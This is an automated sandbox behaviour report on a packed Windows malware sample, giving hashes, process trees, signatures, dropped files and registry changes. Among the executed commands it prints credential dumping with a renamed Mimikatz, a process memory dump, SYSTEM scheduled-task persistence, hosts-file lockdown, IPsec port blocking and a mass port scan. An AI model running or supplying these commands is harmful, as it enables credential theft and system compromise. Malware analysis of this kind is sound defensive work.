- [*] MalFamily: ""
- [*] MalScore: 10.0
- [*] File Name: "Exes_e77b8548080e4a20eb74f40003cb9b42.exe"
- [*] File Size: 5427200
- [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed"
- [*] SHA256: "0105905704b61fcdebe72c1f344237df510451e1bad08986c8629d9857084e0c"
- [*] MD5: "e77b8548080e4a20eb74f40003cb9b42"
- [*] SHA1: "fdefa723f8f48227b28fd750dece152a3fb8d8c2"
- [*] SHA512: "551b574502257f3a95f8d6b1ceb798ef69f793bcf5e8eb5425644c3b6e8a98ee84cbad856c57a4faa6fdb954e34db1093b5e05f186d0d0d102da23f166a59201"
- [*] CRC32: "0F1DD1BB"
- [*] SSDEEP: "98304:gKq+Q2ru+FBpaizgQA0JzpxsMnuviWyUGGKo8YXBfZcH8AKqkWC6ssZWjACGDZH/:S1g59A0JznXoiYG8M+oFZ0ACFA1o"
- [*] Process Execution: [
- "Exes_e77b8548080e4a20eb74f40003cb9b42.exe",
- "cmd.exe",
- "PING.EXE",
- "ghllihr.exe",
- "services.exe",
- "ghllihr.exe",
- "cmd.exe",
- "cmd.exe",
- "cacls.exe",
- "cmd.exe",
- "cacls.exe",
- "cmd.exe",
- "cacls.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "cmd.exe",
- "wpcap.exe",
- "net.exe",
- "net1.exe",
- "net.exe",
- "net1.exe",
- "net.exe",
- "net1.exe",
- "net.exe",
- "net1.exe",
- "cmd.exe",
- "net.exe",
- "net1.exe",
- "cmd.exe",
- "pygejcepu.exe",
- "cmd.exe",
- "vfshost.exe",
- "cmd.exe",
- "cmd.exe",
- "schtasks.exe",
- "cmd.exe",
- "cmd.exe",
- "schtasks.exe",
- "cmd.exe",
- "cmd.exe",
- "schtasks.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "urpjswrnu.exe",
- "netsh.exe",
- "netsh.exe",
- "svchost.exe",
- "svchost.exe",
- "svchost.exe",
- "muemii.exe"
- ]
- [*] Signatures Detected: [
- {
- "Description": "Attempts to connect to a dead IP:Port (2 unique times)",
- "Details": [
- {
- "IP": "192.35.177.64:80"
- },
- {
- "IP": "2.21.71.25:80"
- }
- ]
- },
- {
- "Description": "Possible date expiration check, exits too soon after checking local time",
- "Details": [
- {
- "process": "cmd.exe, PID 2444"
- }
- ]
- },
- {
- "Description": "Creates RWX memory",
- "Details": []
- },
- {
- "Description": "Loads a driver",
- "Details": [
- {
- "driver service name": "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\npf"
- }
- ]
- },
- {
- "Description": "Expresses interest in specific running processes",
- "Details": [
- {
- "process": "lsass.exe"
- },
- {
- "process": "services.exe"
- },
- {
- "process": "csrss.exe"
- },
- {
- "process": "svchost.exe"
- },
- {
- "process": "[System Process]"
- },
- {
- "process": "spoolsv.exe"
- },
- {
- "process": "wininit.exe"
- },
- {
- "process": "pygejcepu.exe"
- },
- {
- "process": "winlogon.exe"
- },
- {
- "process": "lsm.exe"
- }
- ]
- },
- {
- "Description": "Repeatedly searches for a not-found process, may want to run with startbrowser=1 option",
- "Details": []
- },
- {
- "Description": "Reads data out of its own binary image",
- "Details": [
- {
- "self_read": "process: wpcap.exe, pid: 1348, offset: 0x00000000, length: 0x00000200"
- },
- {
- "self_read": "process: wpcap.exe, pid: 1348, offset: 0x00000000, length: 0x0000c000"
- },
- {
- "self_read": "process: wpcap.exe, pid: 1348, offset: 0x00000200, length: 0x00069f39"
- },
- {
- "self_read": "process: wpcap.exe, pid: 1348, offset: 0x0000c01c, length: 0x0005e121"
- }
- ]
- },
- {
- "Description": "Performs some HTTP requests",
- "Details": [
- {
- "url": "http://uio.hognoob.se:63145/cfg.ini"
- },
- {
- "url": "http://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D"
- },
- {
- "url": "http://crl.identrust.com/DSTROOTCAX3CRL.crl"
- }
- ]
- },
- {
- "Description": "The binary likely contains encrypted or compressed data.",
- "Details": [
- {
- "section": "name: UPX1, entropy: 7.82, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x0052c800, virtual_size: 0x0052d000"
- }
- ]
- },
- {
- "Description": "The executable is compressed using UPX",
- "Details": [
- {
- "section": "name: UPX0, entropy: 0.00, characteristics: IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x00000000, virtual_size: 0x00170000"
- }
- ]
- },
- {
- "Description": "Deletes its original binary from disk",
- "Details": []
- },
- {
- "Description": "Forces a created process to be the child of an unrelated process",
- "Details": []
- },
- {
- "Description": "A process attempted to delay the analysis task by a long amount of time.",
- "Details": [
- {
- "Process": "netsh.exe tried to sleep 540 seconds, actually delayed analysis time by 0 seconds"
- },
- {
- "Process": "ghllihr.exe tried to sleep 7129 seconds, actually delayed analysis time by 0 seconds"
- }
- ]
- },
- {
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details": [
- {
- "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 5180833 times"
- }
- ]
- },
- {
- "Description": "Attempts to execute a Living Off The Land Binary command for post exploitation",
- "Details": [
- {
- "MITRE T1078 - schtask": "(Tactic: Execution, Persistence, Privilege Escalation)"
- }
- ]
- },
- {
- "Description": "Mimics the file times of a Windows system file",
- "Details": [
- {
- "mimic_dest": "C:\\Program Files\\WinPcap\\LICENSE",
- "mimic_source": "C:\\Windows\\Temp\\nsm501A.tmp\\options.ini"
- },
- {
- "mimic_dest": "C:\\Program Files\\WinPcap\\rpcapd.exe",
- "mimic_source": "C:\\Windows\\Temp\\nsm501A.tmp\\options.ini"
- }
- ]
- },
- {
- "Description": "Installs itself for autorun at Windows startup",
- "Details": [
- {
- "service name": "tqbseelza"
- },
- {
- "service path": "C:\\Windows\\crznklud\\ghllihr.exe"
- },
- {
- "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\ImagePath"
- },
- {
- "data": "system32\\drivers\\npf.sys"
- },
- {
- "task": "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"trztipllt\" /ru system /tr \"cmd /c C:\\Windows\\ime\\ghllihr.exe\""
- }
- ]
- },
- {
- "Description": "Creates a hidden or system file",
- "Details": [
- {
- "file": "C:\\Windows\\crznklud\\svschost.xml"
- },
- {
- "file": "C:\\Windows\\crznklud\\spoolsrv.xml"
- },
- {
- "file": "C:\\Windows\\crznklud\\vimpcsvc.xml"
- },
- {
- "file": "C:\\Windows\\crznklud\\docmicfg.xml"
- },
- {
- "file": "C:\\Windows\\crznklud\\schoedcl.xml"
- }
- ]
- },
- {
- "Description": "The sample wrote data to the system hosts file.",
- "Details": []
- },
- {
- "Description": "Collects information to fingerprint the system",
- "Details": []
- },
- {
- "Description": "Installs WinPCAP",
- "Details": [
- {
- "file": "C:\\Windows\\System32\\Packet.dll"
- }
- ]
- }
- ]
- [*] Started Service: [
- "tqbseelza",
- "WerSvc",
- "PolicyAgent",
- "npf"
- ]
- [*] Executed Commands: [
- "cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\crznklud\\ghllihr.exe",
- "C:\\Windows\\system32\\PING.EXE ping 127.0.0.1 -n 5",
- "C:\\Windows\\crznklud\\ghllihr.exe",
- "C:\\Windows\\system32\\svchost.exe -k NetworkServiceNetworkRestricted",
- "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
- "cmd /c echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D users & echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D administrators & echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D SYSTEM",
- "netsh ipsec static del all",
- "netsh ipsec static add policy name=Bastards description=FuckingBastards",
- "netsh ipsec static add filteraction name=BastardsList action=block",
- "cmd /c C:\\Windows\\zjbrqggku\\rtalrauta\\wpcap.exe /S",
- "cmd /c net start npf",
- "cmd /c C:\\Windows\\zjbrqggku\\rtalrauta\\pygejcepu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\\Windows\\zjbrqggku\\rtalrauta\\Scant.txt",
- "cmd /c C:\\Windows\\zjbrqggku\\Corporate\\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\\Windows\\zjbrqggku\\Corporate\\log.txt",
- "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"trztipllt\" /ru system /tr \"cmd /c C:\\Windows\\ime\\ghllihr.exe\"",
- "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"mttscklsu\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\crznklud\\ghllihr.exe /p everyone:F\"",
- "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"ehbyeettt\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\TEMP\\nbkteejuk\\muemii.exe /p everyone:F\"",
- "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP",
- "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP",
- "netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList",
- "netsh ipsec static set policy name=Bastards assign=y",
- "C:\\Windows\\TEMP\\zjbrqggku\\urpjswrnu.exe -accepteula -mp 1128 C:\\Windows\\TEMP\\zjbrqggku\\1128.dmp",
- "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP",
- "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP",
- "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo Y\"",
- "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D users",
- "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D administrators",
- "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D SYSTEM",
- "C:\\Windows\\zjbrqggku\\rtalrauta\\wpcap.exe /S",
- "net stop \"Boundary Meter\"",
- "net stop \"TrueSight Meter\"",
- "net stop npf",
- "net start npf",
- "C:\\Windows\\system32\\net1 stop \"Boundary Meter\"",
- "C:\\Windows\\system32\\net1 stop \"TrueSight Meter\"",
- "C:\\Windows\\system32\\net1 stop npf",
- "C:\\Windows\\system32\\net1 start npf",
- "net start npf",
- "C:\\Windows\\system32\\net1 start npf",
- "C:\\Windows\\zjbrqggku\\rtalrauta\\pygejcepu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\\Windows\\zjbrqggku\\rtalrauta\\Scant.txt",
- "C:\\Windows\\zjbrqggku\\Corporate\\vfshost.exe privilege::debug sekurlsa::logonpasswords exit",
- "schtasks /create /sc minute /mo 1 /tn \"trztipllt\" /ru system /tr \"cmd /c C:\\Windows\\ime\\ghllihr.exe\"",
- "schtasks /create /sc minute /mo 1 /tn \"mttscklsu\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\crznklud\\ghllihr.exe /p everyone:F\"",
- "schtasks /create /sc minute /mo 1 /tn \"ehbyeettt\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\TEMP\\nbkteejuk\\muemii.exe /p everyone:F\""
- ]
- [*] Mutexes: [
- "IESQMMUTEX_0_208"
- ]
- [*] Modified Files: [
- "C:\\Windows\\crznklud\\ghllihr.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\13802656\\....\\TemporaryFile",
- "C:\\Users\\user\\AppData\\Local\\Temp\\13802656\\TemporaryFile",
- "C:\\Windows\\System32\\drivers\\etc\\hosts",
- "C:\\Windows\\zjbrqggku\\rtalrauta\\wpcap.exe",
- "C:\\Windows\\zjbrqggku\\rtalrauta\\pygejcepu.exe",
- "C:\\Windows\\zjbrqggku\\rtalrauta\\Packet.dll",
- "C:\\Windows\\zjbrqggku\\rtalrauta\\wpcap.dll",
- "C:\\Windows\\zjbrqggku\\rtalrauta\\lblgpauls.exe",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\cnli-1.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\coli-0.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\crli-0.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\exma-1.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\libeay32.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\libxml2.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\posh-0.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\ssleay32.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\tibe-2.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\trch-1.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\trfo-2.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\tucl-1.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\ucl.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\xdvl-0.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\zlib1.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\svschost.exe",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\spoolsrv.exe",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\vimpcsvc.exe",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\docmicfg.exe",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\schoedcl.exe",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\svschost.xml",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\spoolsrv.xml",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\vimpcsvc.xml",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\docmicfg.xml",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\schoedcl.xml",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\svschost.xml",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\spoolsrv.xml",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\vimpcsvc.xml",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\docmicfg.xml",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\specials\\schoedcl.xml",
- "C:\\Windows\\crznklud\\svschost.xml",
- "C:\\Windows\\crznklud\\spoolsrv.xml",
- "C:\\Windows\\crznklud\\vimpcsvc.xml",
- "C:\\Windows\\crznklud\\docmicfg.xml",
- "C:\\Windows\\crznklud\\schoedcl.xml",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\Shellcode.ini",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\AppCapture64.dll",
- "C:\\Windows\\zjbrqggku\\UnattendGC\\AppCapture32.dll",
- "C:\\Windows\\zjbrqggku\\Corporate\\vfshost.exe",
- "C:\\Windows\\zjbrqggku\\Corporate\\mimidrv.sys",
- "C:\\Windows\\zjbrqggku\\Corporate\\mimilib.dll",
- "C:\\Windows\\zjbrqggku\\upbdrjv\\swrpwe.exe",
- "C:\\Windows\\IME\\ghllihr.exe",
- "C:\\Windows\\Temp\\zjbrqggku\\urpjswrnu.exe",
- "C:\\Windows\\Temp\\nbkteejuk\\muemii.exe",
- "C:\\Windows\\Temp\\nbkteejuk\\config.json",
- "C:\\Windows\\Temp\\20882968\\....\\TemporaryFile",
- "C:\\Windows\\Temp\\20882968\\TemporaryFile",
- "C:\\Windows\\System32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08",
- "C:\\Windows\\System32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08",
- "C:\\Windows\\System32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\644B8874112055B5E195ECB0E8F243A4",
- "C:\\Windows\\System32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\644B8874112055B5E195ECB0E8F243A4",
- "\\Device\\NamedPipe",
- "\\Device\\Http\\Communication",
- "C:\\Windows\\Temp\\nsm5019.tmp",
- "C:\\Windows\\Temp\\nsm501A.tmp\\options.ini",
- "C:\\Windows\\Temp\\nsm501A.tmp\\final.ini",
- "C:\\Windows\\Temp\\nsm501A.tmp\\System.dll",
- "C:\\Windows\\Temp\\nsm501A.tmp\\nsExec.dll",
- "C:\\Windows\\System32\\pthreadVC.dll",
- "C:\\Windows\\System32\\wpcap.dll",
- "C:\\Windows\\System32\\Packet.dll",
- "C:\\Program Files\\WinPcap\\rpcapd.exe",
- "C:\\Program Files\\WinPcap\\LICENSE",
- "C:\\Program Files\\WinPcap\\uninstall.exe",
- "C:\\Windows\\sysnative\\drivers\\npf.sys",
- "C:\\Windows\\sysnative\\wpcap.dll",
- "C:\\Windows\\sysnative\\Packet.dll",
- "\\??\\Global\\NPF_{CFCD29B3-A836-426F-8329-8362EC941293}",
- "\\??\\Global\\NPF_{D720734D-0C14-4C25-829D-F6B4814978B3}",
- "\\??\\Global\\NPF_{CACEFAA3-95D9-4B5B-B275-FF35DF23713E}",
- "\\??\\Global\\NPF_{B22E8C55-CC74-4FBE-B907-F46D25953BEC}",
- "\\??\\Global\\NPF_{5D403E7A-7554-4DD5-A8CF-7099B00A9E2D}",
- "\\??\\Global\\NPF_NdisWanIpv6",
- "\\??\\Global\\NPF_NdisWanBh",
- "\\??\\Global\\NPF_{8C8DAC1D-0390-4B59-BF93-EC6C9E68D36A}",
- "\\??\\Global\\NPF_NdisWanIp",
- "\\??\\Global\\NPF_{BFA735C0-8C32-4848-B88D-FA17C2729720}",
- "\\??\\Global\\NPF_{50CD5E3E-0F08-4519-A9EF-B9802ED12701}",
- "\\??\\Global\\NPF_{D25DE530-2291-4668-A771-4DAC18E7B55D}",
- "C:\\Windows\\zjbrqggku\\rtalrauta\\Scant.txt",
- "C:\\Windows\\zjbrqggku\\Corporate\\log.txt",
- "C:\\Windows\\sysnative\\Tasks\\trztipllt",
- "C:\\Windows\\Temp\\zjbrqggku\\1128.dmp",
- "\\??\\Global\\ProcmonDebugLogger"
- ]
- [*] Deleted Files: [
- "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_e77b8548080e4a20eb74f40003cb9b42.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\13802656\\....\\",
- "C:\\Users\\user\\AppData\\Local\\Temp\\13802656\\TemporaryFile\\TemporaryFile",
- "C:\\Users\\user\\AppData\\Local\\Temp\\13802656\\TemporaryFile",
- "C:\\Users\\user\\AppData\\Local\\Temp\\13802656",
- "C:\\Windows\\zjbrqggku\\rtalrauta\\ip.txt",
- "C:\\Windows\\zjbrqggku\\rtalrauta\\Result.txt",
- "C:\\Windows\\zjbrqggku\\rtalrauta\\Scant.txt",
- "C:\\Windows\\Temp\\nbkteejuk\\config.json",
- "C:\\Windows\\Temp\\20882968\\....\\",
- "C:\\Windows\\Temp\\20882968\\TemporaryFile\\TemporaryFile",
- "C:\\Windows\\Temp\\20882968\\TemporaryFile",
- "C:\\Windows\\Temp\\20882968",
- "C:\\Windows\\Temp\\nsg4FF8.tmp",
- "C:\\Windows\\Temp\\nsm501A.tmp",
- "C:\\Windows\\Temp\\nsm501A.tmp\\final.ini",
- "C:\\Windows\\Temp\\nsm501A.tmp\\nsExec.dll",
- "C:\\Windows\\Temp\\nsm501A.tmp\\options.ini",
- "C:\\Windows\\Temp\\nsm501A.tmp\\System.dll",
- "C:\\Windows\\Temp\\nsm501A.tmp\\",
- "C:\\Windows\\Tasks\\trztipllt.job"
- ]
- [*] Modified Registry Keys: [
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\PolicyAgent\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\PolicyAgent\\Start",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\Start",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\ErrorControl",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\ImagePath",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\DisplayName",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\npf\\WOW64",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\DefaultConnectionSettings",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-100",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-101",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-103",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-102",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-1",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-2",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-4",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-3",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-100",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-101",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-102",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-103",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-100",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-101",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-102",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-103",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\ipsecNegotiationPolicyAction",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\ipsecNegotiationPolicyType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\description",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\ipsecName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\ipsecISAKMPReference",
